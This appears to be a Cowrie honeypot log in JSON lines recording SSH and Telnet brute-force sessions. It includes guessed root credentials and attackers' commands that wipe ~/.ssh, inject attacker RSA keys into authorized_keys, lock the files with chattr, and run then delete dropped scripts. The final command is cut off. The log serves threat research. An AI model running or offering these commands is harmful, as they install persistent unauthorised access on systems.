{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60092,"dst_ip":"1.2.3.4","dst_port":22,"session":"c58a1fa186f7","protocol":"ssh","message":"New connection: 212.227.235.229:60092 (1.2.3.4:22) [session: c58a1fa186f7]","sensor":"my-vps","timestamp":"2025-08-26T02:02:28.434166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:02:28.434963Z","src_ip":"212.227.235.229","session":"c58a1fa186f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:02:28.717356Z","src_ip":"212.227.235.229","session":"c58a1fa186f7"}
{"eventid":"cowrie.login.success","username":"root","password":"Baidu123","message":"login attempt [root/Baidu123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:02:29.885948Z","src_ip":"212.227.235.229","session":"c58a1fa186f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:02:30.463815Z","src_ip":"212.227.235.229","session":"c58a1fa186f7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:02:30.464483Z","src_ip":"212.227.235.229","session":"c58a1fa186f7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:02:30.465872Z","src_ip":"212.227.235.229","session":"c58a1fa186f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:02:30.751902Z","src_ip":"212.227.235.229","session":"c58a1fa186f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:02:31.423864Z","src_ip":"212.227.235.229","session":"c58a1fa186f7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:02:31.424545Z","src_ip":"212.227.235.229","session":"c58a1fa186f7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:02:31.708854Z","src_ip":"212.227.235.229","session":"c58a1fa186f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:02:31.709700Z","src_ip":"212.227.235.229","session":"c58a1fa186f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60096,"dst_ip":"1.2.3.4","dst_port":22,"session":"92290cf3783b","protocol":"ssh","message":"New connection: 212.227.235.229:60096 (1.2.3.4:22) [session: 92290cf3783b]","sensor":"my-vps","timestamp":"2025-08-26T02:02:31.966175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:02:31.966989Z","src_ip":"212.227.235.229","session":"92290cf3783b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:02:32.226585Z","src_ip":"212.227.235.229","session":"92290cf3783b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:02:33.306387Z","src_ip":"212.227.235.229","session":"92290cf3783b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:02:34.567056Z","src_ip":"212.227.235.229","session":"92290cf3783b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33622,"dst_ip":"1.2.3.4","dst_port":22,"session":"de153ce0cd8b","protocol":"ssh","message":"New connection: 212.227.235.229:33622 (1.2.3.4:22) [session: de153ce0cd8b]","sensor":"my-vps","timestamp":"2025-08-26T02:02:34.826350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:02:34.827301Z","src_ip":"212.227.235.229","session":"de153ce0cd8b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:02:35.089113Z","src_ip":"212.227.235.229","session":"de153ce0cd8b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:02:36.169972Z","src_ip":"212.227.235.229","session":"de153ce0cd8b"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:02:36.432811Z","src_ip":"212.227.235.229","session":"c58a1fa186f7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:02:36.433928Z","src_ip":"212.227.235.229","session":"de153ce0cd8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57520,"dst_ip":"1.2.3.4","dst_port":23,"session":"6aa55b3291e7","protocol":"telnet","message":"New connection: 212.227.235.229:57520 (1.2.3.4:23) [session: 6aa55b3291e7]","sensor":"my-vps","timestamp":"2025-08-26T02:02:41.441847Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:02:41.785984Z","src_ip":"212.227.235.229","session":"6aa55b3291e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:02:41.863580Z","src_ip":"212.227.235.229","session":"6aa55b3291e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38660,"dst_ip":"1.2.3.4","dst_port":22,"session":"bea12d83d337","protocol":"ssh","message":"New connection: 212.227.235.229:38660 (1.2.3.4:22) [session: bea12d83d337]","sensor":"my-vps","timestamp":"2025-08-26T02:02:59.494444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:03:00.190453Z","src_ip":"212.227.235.229","session":"bea12d83d337"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T02:03:00.191575Z","src_ip":"212.227.235.229","session":"bea12d83d337"}
{"eventid":"cowrie.login.success","username":"root","password":"00990099","message":"login attempt [root/00990099] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:03:05.005345Z","src_ip":"212.227.235.229","session":"bea12d83d337"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:03:05.939401Z","src_ip":"212.227.235.229","session":"bea12d83d337"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:03:25.456068Z","src_ip":"212.227.125.160","session":"4bbdb8731a0b"}
{"eventid":"cowrie.session.closed","duration":180.13577365875244,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:03:25.460862Z","src_ip":"212.227.125.160","session":"4bbdb8731a0b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50530,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d42cbdeeaeb","protocol":"ssh","message":"New connection: 217.72.205.35:50530 (1.2.3.4:22) [session: 9d42cbdeeaeb]","sensor":"my-vps","timestamp":"2025-08-26T02:03:31.749039Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:03:31.750268Z","src_ip":"217.72.205.35","session":"9d42cbdeeaeb"}
{"eventid":"cowrie.session.connect","src_ip":"89.251.44.208","src_port":43482,"dst_ip":"1.2.3.4","dst_port":23,"session":"97e9b869bd98","protocol":"telnet","message":"New connection: 89.251.44.208:43482 (1.2.3.4:23) [session: 97e9b869bd98]","sensor":"my-vps","timestamp":"2025-08-26T02:03:33.176664Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36612,"dst_ip":"1.2.3.4","dst_port":22,"session":"6def1cefa331","protocol":"ssh","message":"New connection: 212.227.235.229:36612 (1.2.3.4:22) [session: 6def1cefa331]","sensor":"my-vps","timestamp":"2025-08-26T02:03:41.181660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:03:41.182623Z","src_ip":"212.227.235.229","session":"6def1cefa331"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:03:41.442564Z","src_ip":"212.227.235.229","session":"6def1cefa331"}
{"eventid":"cowrie.login.failed","username":"zhangfeng","password":"zhangfeng","message":"login attempt [zhangfeng/zhangfeng] failed","sensor":"my-vps","timestamp":"2025-08-26T02:03:42.521307Z","src_ip":"212.227.235.229","session":"6def1cefa331"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:03:43.784062Z","src_ip":"212.227.235.229","session":"6def1cefa331"}
{"eventid":"cowrie.session.closed","duration":15.270702123641968,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:03:48.447295Z","src_ip":"89.251.44.208","session":"97e9b869bd98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44864,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3c5dc1e579f","protocol":"ssh","message":"New connection: 212.227.125.160:44864 (1.2.3.4:22) [session: f3c5dc1e579f]","sensor":"my-vps","timestamp":"2025-08-26T02:03:59.402467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:03:59.438833Z","src_ip":"212.227.125.160","session":"f3c5dc1e579f"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-26T02:03:59.494146Z","src_ip":"212.227.125.160","session":"f3c5dc1e579f"}
{"eventid":"cowrie.login.success","username":"root","password":"zxc,./123","message":"login attempt [root/zxc,./123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:03:59.734580Z","src_ip":"212.227.125.160","session":"f3c5dc1e579f"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:03:59.799442Z","src_ip":"212.227.125.160","session":"f3c5dc1e579f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52626,"dst_ip":"1.2.3.4","dst_port":22,"session":"443828a65d1f","protocol":"ssh","message":"New connection: 212.227.125.160:52626 (1.2.3.4:22) [session: 443828a65d1f]","sensor":"my-vps","timestamp":"2025-08-26T02:03:59.853208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:03:59.853961Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T02:03:59.897072Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.login.success","username":"root","password":"zxc,./123","message":"login attempt [root/zxc,./123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:04:00.028418Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:04:09.804446Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa 